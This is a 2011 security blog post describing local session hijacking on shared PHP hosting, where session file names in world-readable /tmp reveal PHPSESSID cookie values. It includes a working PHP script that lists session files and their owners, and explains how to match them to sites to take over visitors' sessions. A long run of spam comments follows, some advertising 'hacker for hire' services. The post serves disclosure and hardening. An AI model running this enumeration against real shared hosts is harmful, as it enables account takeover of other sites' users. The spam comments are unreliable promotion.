( ~~~ )
  ))^ ^((
 ((* - *))
   _) (_
 / '--' \     ^
//(_  _)\\   /_\
\\ )__( //   .'
 (( v  ))   (
   \| /\     '-.
    K(  \       )
    |\\  '-._.-'
    ||\\
  *_-P/,P
     '-
Want your PHP application manually audited? Check out Xxor AB's PHP Security Auditing Service

Thursday, August 4, 2011

Local Session Hijacking in PHP

Recently I discovered that the shared hosting provider I sometimes use is susceptible to this age-old technique that everyone really should know about by now.

PHP's default session handler stores session data in files. And by default these files are placed in /tmp. In a shared enviroment session files should never be placed in a directory that can be read by a malicious local user like the world readable /tmp directory.

Even if the session files might be protected from being read or written by a malicious user, their name leaks valuable information. The name of a typical session file name reads "sess_0m9gnkgenne66kvs3eklhvucjmdpchto". All the numbers and letters following "sess_" are those of the PHPSESSID cookie which that session is tied to. Any local user who can enumerate the files in this directory can therefor hijack the cookies belonging to the visitors of all the websites located in the shared host. One of them might belong to an admin at one of the local websites.

POC

Here is a short script to enumerate session files and their respective local owner. <?php // http://ha.xxor.se/2011/08/local-session-hijacking.html // Retrieve the path where session files are saved session_save_path(); // Might have to be called twice... not sure. $sesspath = session_save_path(); if(php_sapi_name()!=='cli')echo "<pre>\n"; // Test session.save_handler $sessmod = session_module_name(); if(empty($sessmod))$sessmod = ini_get('session.save_handler'); echo "[i] Session save handler: $sessmod\n"; if($sessmod !== 'files'){ echo "[!] Possible Error: session.save_handler is set to '$sessmod' instead of 'files'. Trying anyway.\n"; } if(empty($sesspath)){ $sesspath = ini_get('session.save_path'); if(empty($sesspath)){ if(function_exists('sys_get_temp_dir')){ $sesspath = sys_get_temp_dir(); }else{ die('Error:Cant fins session save path. Try setting it manualy.'); } } } $sesspath = array_pop(explode(';',$sesspath)); echo "[i] Session save path: $sesspath\n"; // Enumerate sessions and their owner. clearstatcache(); echo "\nOwner File\n"; if(!findSessIn($sesspath)){ die("[!] Error: Cannot open the session save path.\n"); } function findSessIn($dir){ if(!($handler = opendir($dir))){ return false; } while ($file = readdir($handler)){ $path = substr($dir, -1) === DIRECTORY_SEPARATOR ? $dir.$file : $dir.DIRECTORY_SEPARATOR.$file; if (substr($file, 0, 5) === 'sess_'){ $owner = fileowner($path); if(function_exists('posix_getpwuid')){ $owner = posix_getpwuid($owner); $owner = $owner['name']; } if(strlen($owner) < 16)$owner = substr($owner.str_repeat(' ',15), 0, 15); echo "$owner $path\n"; }elseif(strlen($file) === 1 && is_dir($path) && $file !== '.'){ findSessIn($path); } } closedir($handler); return true; } ?> To find out which website corresponds to which local user, simply visit the website, grab your cookie and then search for its value and the local user in the list.

27 comments:

  1. @Anonymous
    @Lagripe-dz

    Thank you.
    If you like messing with session, stay tuned.
    I've got an interesting series of articles about session poisoning coming up.

    ReplyDelete
  2. Please keep this kind of blog-posts coming.

    The articles are very well written, and gives good insights that other blogs dont.

    Thx for sharing :]

    ReplyDelete
  3. Informative post!! It means a lot to me. Other than this, Get Free Subscribers and Free YouTube views in few seconds! Use it daily to get free subs, likes & views from real channel owners, just like you!

    ReplyDelete
  4. best induction cooktop. The articles are very well written, and gives good insights that other blogs dont.

    ReplyDelete
  5. I think hosting provider companies should also provide their services regarding server related problems, because server related problems are very common and a lot of people suffer from this. Essay Writing Service

    ReplyDelete
  6. Are you also searching for spanish nursing writing services we are the best solution for you. We are best known for delivering the best services to students.  

    ReplyDelete
  7. this is great:https://www.nursingwritingcenter.com/nursing-writing-services

    ReplyDelete
  8. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    Scrum master certification
    csm certification cost

    ReplyDelete
  9. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    Scrum master certification
    csm certification

    ReplyDelete
  10. Excellent content ,Thanks for sharing this .,
    Leanpitch provides online training in CSPO, everyone can use it wisely.

    Product owner certification
    Product owner training

    ReplyDelete
  11. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    certified scrum master certification
    agile scrum master certification

    ReplyDelete
  12. Excellent content ,Thanks for sharing this .,
    Leanpitch provides online training in CSPO, everyone can use it wisely.
    CSPO certification
    CSPO TRAINING

    ReplyDelete

  13. Excellent content ,Thanks for sharing this .,
    Leanpitch provides online training in ICP ACC, everyone can use it wisely.

    Agile coach certification
    Agile coach certification online

    ReplyDelete
  14. Excellent content ,Thanks for sharing this .,
    Leanpitch provides online training in ICP ACC, everyone can use it wisely.

    ICP ACC certification
    Certified Agile coach

    ReplyDelete
  15. This is a great web site. Good sparkling user interface and very informative blogs. OmAstrology.com

    ReplyDelete
  16. Hey, Your blog is very informative. It is nice to read such high-quality content. Attractive information on your blog, thank you for taking the time and share with us. Thanks Astrolika

    ReplyDelete
  17. I read the above article and I got some different kind of information from your article about a mattress. It is a helpful article to enhance our knowledge for us. Thankful to you for sharing an article like this.Hire A Verified Hacker

    ReplyDelete
  18. Excellent post. I really enjoy reading and also appreciate your work. This concept is a good way to enhance knowledge. Keep sharing this kind of articles, Thank you.Hire A Professional Lottery Hacker in Usa

    ReplyDelete
  19. You have shared a very informative article. I was looking for the kind of unique information local users. Keep sharing more solutions on this topic. Now it's time to get Long distance taxi for more information.

    ReplyDelete
  20. Great information in this article. It's really helpful and useful for all local users and marketers. Thank you for taking the time to share a short script to enumerate session files. Now it's time to get inbound call center for more information.

    ReplyDelete